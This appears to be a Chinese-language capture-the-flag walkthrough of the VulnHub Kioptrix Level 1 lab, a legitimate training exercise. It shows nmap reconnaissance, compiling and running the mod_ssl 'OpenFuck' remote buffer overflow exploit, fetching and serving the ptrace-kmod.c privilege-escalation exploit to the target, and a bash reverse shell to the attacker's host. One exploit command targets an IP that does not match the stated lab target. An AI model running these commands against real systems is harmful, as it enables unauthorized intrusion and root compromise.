靶场下载地址
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
目标
本机IP:192.168.118.128
靶机IP:192.168.118.0/24
一、信息收集
1. 扫存活主机
javascript
nmap -sP 192.168.118.0/24
本机IP 为192.168.118.128
分析得靶机IP为 192.168.118.129
2. 扫全端口
javascript
nmap -p- 192.168.118.129

3. 服务详情扫描
javascript
nmap -sV -A 192.168.118.129

发现开放的443端口,其中Apache/1.3.20,版本过低,可查找mod_ssl 漏洞
二、漏洞发现
1. 查找 mod_ssl 漏洞
javascript
searchsploit mod_ssl

2. 漏洞版本
在https://www.exploit-db.com(漏洞库)中查找,使用最新漏洞利用:
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) unix/remote/47080.c

三、漏洞利用
1. 获取漏洞脚本
漏洞路径查询,当前路径查询,把脚本拷贝到当前桌面
bash
locate unix/remote/47080.c
pwd
cp /usr/share/exploitdb/exploits/unix/remote/47080.c /root/Desktop

查看此脚本文件
发现需要安装相关依赖,编译,已给出相关利用指令

2. 使用脚本文件
安装依赖,编译
bash
apt-get install libssl-dev
gcc -o 47080 47080.c -lcrypto
使用脚本文件
bash
./文件名 显示文件使用说明

找到对应版本,尝试利用此脚本
bash
./47080 0x6b 192.168.233.131 443 -c 40

此时发现已经得到 Shell ,输入 whami 尝试 ,发现只是普通用户
观察发现是 ptrace-kmod.c 文件获取失败
在给出的网址中下载 ptrace-kmod.c 到本地桌面,查看发现此文件为提权脚本文件
四、提权
1. kali 本机下载目标提权脚本
bash
kali本机下载目标提权脚本:
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
2. 远程下载
在本地启动HTTP服务器,在目标中下载本地文件 ptrace-kmod.c并编译,然后重新利用漏洞,然后测试发现提权成功,获得root权限。
bash
python -m http.server 80
wget 192.168.118.128/ptrace-kmod.c

3. Bash反弹Shell
bash
nc -lvvp 6666
bash -i >& /dev/tcp/192.168.118.128/6666 0>&1
